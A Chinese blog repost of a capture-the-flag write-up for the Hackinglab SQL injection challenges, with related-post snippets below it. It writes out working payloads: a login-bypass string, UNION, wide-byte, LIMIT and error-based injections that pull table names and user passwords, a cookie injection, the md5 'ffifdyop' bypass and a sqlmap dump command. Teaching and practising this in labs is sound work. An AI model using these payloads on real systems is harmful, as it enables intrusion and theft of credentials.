注入所有php页面 $md5,每天一道CTF(9) Hackinglab 注入关

于 2021-03-17 10:41:10 发布
阅读量181 收藏
点赞数
文章标签: 注入所有php页面 $md5

万能密码

题目中有提示,打开源码发现

万能密码 用户名 admin' or 1=1#

密码任意过之。

2-最简单的SQL注入(熟悉注入环境)

UNION注入.

根据源码Tip,在URL尾部加上 ?id=2

,显示出第二篇文章。

加上 AND 1=1

和 AND 1=2

发现输出不同,判断存在注入。

在其后加入 OR 1=1

爆出所有的文章,得到flag。

3-防注入

宽字节注入。

各种尝试,在参数后 id=3%df’发现php错误,是mysql语法发生问题。推测存在宽字节注入。

比较奇怪的是这个页面居然把数字用引号包起来?

?id=2%df' ORDER BY 3%23

无错,有3个字段

?id=2%df' UNION SELECT 1,2,3%23

第2、3字段可显

?id=2%df' UNION SELECT 1,database(),user()%23

数据库mydbs

?id=2%df' UNION SELECT 1,database(),table_name FROM information_schema.tables WHERE table_schema=0x6D79646273%23

表名 sae_user_sqli4

?id=2%df' UNION SELECT 1,database(),GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x7361655F757365725F73716C6934%23

字段名id,title_1,content_1

?id=2%df' UNION SELECT 1,CONCAT(GROUP_CONCAT(id),0x20,GROUP_CONCAT(title_1)),GROUP_CONCAT(content_1) FROM sae_user_sqli4%23

flag Hsaagdfs56sdf7fsdv flag的id是229212

4-到底能不能回显

LIMIT注入。

看到URL是start和num两个参数,猜测是LIMIT注入。

网上找到代码,LIMIT显错注入:

?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)%23&num=1

出数据库名mydbs

?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()))),1)%23&num=1

出表名article,user

?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x75736572))),1)%23&num=1

出表article的字段名 id,username,password,lastloginIP

?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(SELECT CONCAT(username,0x20,password) FROM user LIMIT 2,1))),1)%23&num=1

出几组账号密码

最后有 flag myflagishere

5-邂逅

准确的说是用“图片注入”,在图片URL后面宽字节注入。

用burpsuite截图片包,然后在图片URL后面加入 %df'

即 /images/dog1.jpg%df'

,取得错误信息。可以注入

6-ErrorBased

显错注入.

页面上没有显示点,但是有SQL错误信息。

?username=admin' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())))%23

表名 log,motto,user

?username=admin' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='log')))%23

改换log处为motto、user可出字段

log: id,username,time

motto: id,username,motto

user: id,username,password

?username=admin' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT CONCAT(username,0x20,motto) FROM motto LIMIT 3,1)))%23

出现字符串 #adf#ad@@# key#notfound!#

,空格分界的地方是我们加上的,取motto字段的值key#notfound!#,题目提示不含key和#,所以key为 notfound!

8-SQL注入通用防护

Cookie注入。

document.cookie="id=2 AND 1=2 UNION SELECT 1,username,password FROM sae_manager_sqli8"

9-据说哈希后的密码是不能产生注入的

PHP函数特性。

md5($str,true)

返回md5后的转码结果,用字符串 ffifdyop

替代密码,即可产生 'or'

注入

注意:本文来自Park St.。本站无法对本文内容的真实性、完整性、及时性、原创性提供任何保证,请您自行验证核实并承担相关的风险与后果!

CoLaBug.com遵循[CC BY-SA 4.0]分享并保持客观立场,本站不承担此类作品侵权行为的直接责任及连带责任。您有版权、意见、投诉等问题,请通过[eMail]联系我们处理,如需商业授权请联系原作者/原网站。

张少壮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vue MD5加密
weixin_42499566的博客
11-29 283
vue的MD5加密,密码加密传输。
HackingLab 注入
Galaxy_fan的博客
07-13 1426
$strsql="select * from `user` where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'";
Hackinglab注入
weixin_30721899的博客
11-27 1414
基本做过忘记做记录。没事做做注入,做一下笔记。 1.最简单的SQL注入   Tips题目里有简单提示.页面如下图。 说了有提示,就看看源码。 payload :admin ' or 1=1# 2.最简单的SQL注入(熟悉注入环境) pyload: http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92...
hackinglab.cn 注入之一
r00tnb的博客
12-15 3787
题目: Tips题目里有简单提示. writeup: 第一应该挺简单的。 点击题目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: <!-- Tips login as admin--> 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
hackinglab注入WP
Yale的博客
04-06 805
1.简单的SQL注入 源码有提示: 用admin登录,明摆着告诉我们用万能密码啊username:admin' or 1=1# password:任意一定要填对验证码 就得到key了2.最简单的SQL注入(熟悉注入环境) 又有提示 开始构造php?id=1 1' 1 or 1得到key3.防注入 需要用到limit,or,宽字符 ?id=1' or 1=1
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
md5.zip_ctfmd5题_md5 ctf_md5 ctf_md5解密 ctf_解密
09-20
"ctfmd5题"和"md5 ctf"标签暗示了这是一个MD5CTF挑战,可能涉及到以上提到的一种或多种解密技术。参赛者不仅需要了解MD5的基本原理,还可能需要掌握Python编程、密码学知识,甚至数学和逻辑推理能力,以解决...
SQL注入原理及PHP注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相的图片实例,具体可下载查看。
F5-steganography图片隐写工具,带使用方法,内含CTF群及所有工具包
11-29
F5-steganography图片隐写工具,带使用方法,内含CTF群及所有工具包
hackinglab注入WP(二)
Yale的博客
04-07 1563
HACKLAB注入(http://www.tuicool.com/articles/nMrqeay) 4.到底能不能回显 构造这个语句 ?start=0 procedure analyse(extractvalue(rand(),concat(1, 得到结果 XPATH syntax error: 'article,user'   知道现在的数据库中有两个表:article和user
hackinglab.cn注入之六
r00tnb的博客
12-15 1348
题目: 本题目为手工注入学习题目,主要用于练习基于Mysql报错的手工注入。Sqlmap一定能跑出来,所以不必测试了。flag中不带key和# writeup: 题目上都说了是基于mysql报错的手工注入。 进入题目后返回如下界面; username:admin status:ok 直接加单引号返回: Warning: mysql_fetch_row() expects ...
hackinglab.cn 注入之四
r00tnb的博客
12-15 1678
题目: 小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢?   writeup: 写在前面:地址由于太长题目地址就用url代替。 点击题目进去, ...
C++中函数调用时的三种参数传递方式详解
qq_23923713的博客
11-28 365
原文地址:https://blog.csdn.net/ccblogger/article/details/77752659?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.co
hackinglab.cn注入之三
r00tnb的博客
12-15 1876
题目: 小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!(flag是随机序列) writeup: 点击题目地址进去,发现一段话。 查看源代码,发现提示: <!-- tips: id=1 构造id参数的查询语句,各种试id的值,发现结果只有一句话和空白页两种情况。然后添加单引号发现返回空白页。 由于加单引号会出现空白页,没有报错,尝试宽字...
HackingLab 注入第7题
11-19 179
HackingLab 注入第7题通过时间注入,获得了一些信息,但在填入FLAG值时都不正确,以下为结果,供大家参考 sqlmap -u "http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin" --dump -C "motto" -T "motto" -D "mydbs" 通过sqlmap获得了,数据库为mydbs,表有3个 log()、motto(id,motto,usirnam
网络安全攻防实验室通教程-注入
热门推荐
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一题:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2题:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
【writeup】网安实验室hackinglab 注入
Oliver99877的博客
10-12 462
【题目1】 最简单的SQL注入 分值: 100 最简单的SQL注入 【思路】 本题未做任何防护,可以考虑在用户名处:1' or 1=1 -- 通过闭合单引号,然后注释掉后面原有的单引号来注入 密码随便填写即可 【题目2】 最简单的SQL注入(熟悉注入环境) 分值: 100 最简单的SQL注入 【思路】 1.index.php?id=1'...
网络信息安全学习平台---注入第7题
幽狼传说
06-21 3029
网络信息安全学习平台网址:http://hackinglab.cn/ sql盲注:题目内容见平台上的第7题 我主要使用的基于时间的盲注,其它类型的盲注可自行测试 1、首先要确定数据库名的长度 输入 http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值